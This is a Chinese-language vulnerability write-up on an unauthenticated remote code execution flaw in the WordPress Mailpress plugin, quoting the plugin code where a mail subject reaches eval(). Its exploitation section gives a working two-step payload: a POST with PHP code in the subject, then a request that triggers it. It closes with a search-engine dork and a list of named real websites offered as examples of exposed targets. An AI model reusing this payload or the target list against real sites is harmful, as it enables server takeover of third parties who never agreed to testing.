WordPress-Mailpress远程代码执行漏洞

circle4

0x00 介绍

Mailpress是一个比较流行的邮件插件。
Plugin Directory:https://wordpress.org/plugins/mailpress/
官网:http://blog.mailpress.org
此漏洞已于2016年06月21日通报给wordpress。

0x01 漏洞简述

Mailpress存在越权调用,在不登陆的情况下,可以调用系统某些方法,造成远程命令执行。

0x02 漏洞详细

文件:
mailpress\mp-includes\action.php
<?php
//
include(‘../../../../wp-load.php’);
//
include(‘../../../../wp-admin/includes/admin.php’);
//
new MP_Actions();
转到:
mailpress\mp-includes\class\MP_Actions.class.php
即可以调用 MP_Actions.class.php 文件中任意方法。
其中:
autosave方法是添加邮件内容

我们来重点看看
public static function iview()
{
$mp_general = get_option(MailPress::option_name_general);
$id = $_GET[‘id’];
$main_id = (isset($_GET[‘main_id’])) ? $_GET[‘main_id’] : $id;
$mail = MP_Mail::get($id);
$theme = (isset($_GET[‘theme’]) && !empty($_GET[‘theme’])) ? $_GET[‘theme’] : (!empty($mail->theme) ? $mail->theme : false);
$mp_user_id = (isset($_GET[‘mp_user_id’]) && !empty($_GET[‘mp_user_id’])) ? $_GET[‘mp_user_id’] : false;
// from
$from = (!empty($mail->fromemail)) ? MP_Mail::display_toemail($mail->fromemail, $mail->fromname) : MP_Mail::display_toemail($mp_general[‘fromemail’], $mp_general[‘fromname’]);
// to
$to = MP_Mail::display_toemail($mail->toemail, $mail->toname, ”, $mp_user_id);
// subject
$x = new MP_Mail();
$subject = (in_array($mail->status, array(‘sent’, ‘archived’))) ? $mail->subject : $x->do_eval($mail->subject);
$subject = $x->viewsubject($subject, $id, $main_id, $mp_user_id);
// template
$template = (in_array($mail->status, array(‘sent’, ‘archived’))) ? false : apply_filters(‘MailPress_draft_template’, false, $main_id);
// content
$args = array();
$args[‘action’] = ‘viewadmin’;
foreach(array(‘id’, ‘main_id’, ‘theme’, ‘template’, ‘mp_user_id’) as $x) if ($$x) $args[$x] = $$x;
foreach(array(‘html’, ‘plaintext’) as $type)
{
$args[‘type’] = $type;
if (!empty($mail->{$type})) $$type = “<iframe id=’i{$type}’ style=’width:100%;border:0;height:550px’ src='” . esc_url(add_query_arg( $args, MP_Action_url )) . “‘></iframe>”;
}
// attachements
$attachements = ”;
$metas = MP_Mail_meta::has( $args[‘main_id’], ‘_MailPress_attached_file’);
if ($metas) foreach($metas as $meta) $attachements .= “<tr><td>&#160;” . MP_Mail::get_attachement_link($meta, $mail->status) . “</td></tr>”;
$view = true;
include(MP_ABSPATH . ‘mp-includes/html/mail.php’);
}

注意到代码:
$subject = (in_array($mail->status, array(‘sent’, ‘archived’))) ? $mail->subject : $x->do_eval($mail->subject);function do_eval($x)
{
$x = ‘global $posts, $post, $wp_did_header, $wp_did_template_redirect, $wp_query, $wp_rewrite, $wpdb, $wp_version, $wp, $id, $comment, $user_ID; ?>’ . “\n $x”;
ob_start();
echo(eval($x));
$r = ob_get_contents();
ob_end_clean();
return $r;
}

因此,subject参数造成远程命令执行

0x03 漏洞利用

http://127.0.0.1/wordpress/wp-content/plugins/mailpress/mp-includes/action.php
POST
action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1

image1shell 地址
 http://127.0.0.1/wordpress/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=5


image2

0x04 漏洞影响:

image3

0x05 Google Hack:

allinurl:plugins/mailpress
http://www.climbsf.com
http://www.abll.org
http://en.grandevreuxtourisme.fr
http://www.digicult.co.uk
http://www.boardinghouse.ca
http://tletl.cahttp://maracatu.org.br
http://www.ville-emploi.asso.fr
http://thefairwaysbar.ie
http://cancouncil.org
http://blog.mailpress.org
http://www.communitydevelopmentalliancescotland.org

0x06 example:

http://www.climbsf.com
http://www.abll.org
http://en.grandevreuxtourisme.fr
http://www.digicult.co.uk
http://www.boardinghouse.ca
http://tletl.cahttp://maracatu.org.br
http://www.ville-emploi.asso.fr
http://thefairwaysbar.ie
http://cancouncil.org
http://blog.mailpress.org
http://www.communitydevelopmentalliancescotland.org